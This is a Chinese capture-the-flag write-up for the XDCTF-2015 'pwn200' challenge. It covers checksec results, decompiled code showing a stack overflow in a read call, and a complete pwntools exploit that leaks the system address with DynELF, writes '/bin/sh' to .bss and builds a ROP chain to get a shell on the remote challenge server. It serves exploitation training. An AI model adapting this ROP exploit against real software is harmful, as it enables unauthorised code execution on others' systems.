题目链接

PWN200
题目和JarvisOJ level4很像

检查保护

利用checksec --file pwn200可以看到开启了NX防护

静态反编译结构

Main函数反编译结果如下

int __cdecl main()
{
  int buf; // [esp+2Ch] [ebp-6Ch]
  int v2; // [esp+30h] [ebp-68h]
  int v3; // [esp+34h] [ebp-64h]
  int v4; // [esp+38h] [ebp-60h]
  int v5; // [esp+3Ch] [ebp-5Ch]
  int v6; // [esp+40h] [ebp-58h]
  int v7; // [esp+44h] [ebp-54h]

  buf = 1668048215;
  v2 = 543518063;
  v3 = 1478520692;
  v4 = 1179927364;
  v5 = 892416050;
  v6 = 663934;
  memset(&v7, 0, 0x4Cu);
  setbuf(stdout, (char *)&buf);
  write(1, &buf, strlen((const char *)&buf));
  sub_8048484();
  return 0;
}

sub_8048484()反编译如下：

ssize_t sub_8048484()
{
  char buf; // [esp+1Ch] [ebp-6Ch]

  setbuf(stdin, &buf);
  return read(0, &buf, 0x100u);   //明显栈溢出
}

EXP思路

利用DynELF泄露出system地址，通过3pop,ret调用read函数，将'/bin/sh'写入到bss段中，之后构造ROP链system调用bss段中'/bin/sh'达到提权目的。
DynELF方法参考安全客的一篇文章【技术分享】借助DynELF实现无libc的漏洞利用小结

完整EXP

from pwn import *
io = remote('111.198.29.45','39532')
#io = process('./pwn200')
#context.log_level= 'debug'

elf = ELF('./pwn200')
ppp_r = 0x80485cd
read_got = elf.got['read']
read_plt = elf.plt['read']
main_addr = 0x80484be
start_addr = 0x80483d0
write_plt = elf.plt['write']
write_got = elf.got['write']
func_addr = 0x8048484
def leak(address):
    payload1 = 'A'*112+p32(write_plt)+p32(func_addr)+p32(1)+p32(address)+p32(4)
    io.send(payload1)
    data = io.recv(4)
    print data
    return data
print io.recv()
dyn = DynELF(leak,elf=ELF('./pwn200'))

sys_addr = dyn.lookup('system','libc')
print 'system address: ',hex(sys_addr)
payload = 'a'*112+p32(start_addr)
io.send(payload)
io.recv()
bss_addr =elf.bss()
print 'bss addr: ',hex(bss_addr)

payload = 'a'*112 + p32(read_plt)+p32(ppp_r)+p32(0)+p32(bss_addr)+p32(8)
payload +=p32(sys_addr)+p32(func_addr)+p32(bss_addr)
io.send(payload)
io.send('/bin/sh')


io.interactive()

参考文章：

[1] (攻防世界）（XDCTF-2015）pwn200